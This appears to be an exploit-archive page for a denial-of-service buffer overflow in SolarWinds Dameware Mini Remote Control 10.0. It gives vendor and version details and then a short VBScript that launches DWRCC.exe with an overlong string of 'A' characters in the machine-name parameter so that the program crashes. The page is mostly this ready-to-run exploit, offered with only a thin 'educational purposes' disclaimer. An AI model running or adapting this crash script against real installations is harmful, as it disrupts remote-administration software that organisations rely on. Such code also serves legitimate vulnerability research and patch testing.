Solarwinds dameware mini remote control 10.0 denial of service Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-05-03 |
Type : dos |
Platform : windows
This exploit / vulnerability Solarwinds dameware mini remote control 10.0 denial of service is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#Vendor: Solarwinds
#Site Vendor: https://www.dameware.com/
#Product: Dameware Mini Remote Control
#Version: 10.0 x64
#Platform: Windows
#Tested on: Windows 7 SP1 x64
#Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability.
#The buffer size passed in on the machine name parameter is not checked
#Vector: pass buffer to the machine host name parameter
option explicit
dim fold,exe,buf,i,wsh,fso,result
exe = "DWRCC.exe"
fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64
#1\"
for i = 0 to 300
buf = buf & "A"
next
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
if fso.folderexists(fold) then
fold = fold & exe
fold = chr(34) & fold & chr(34)
result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)
end if
Solarwinds dameware mini remote control 10.0 denial of service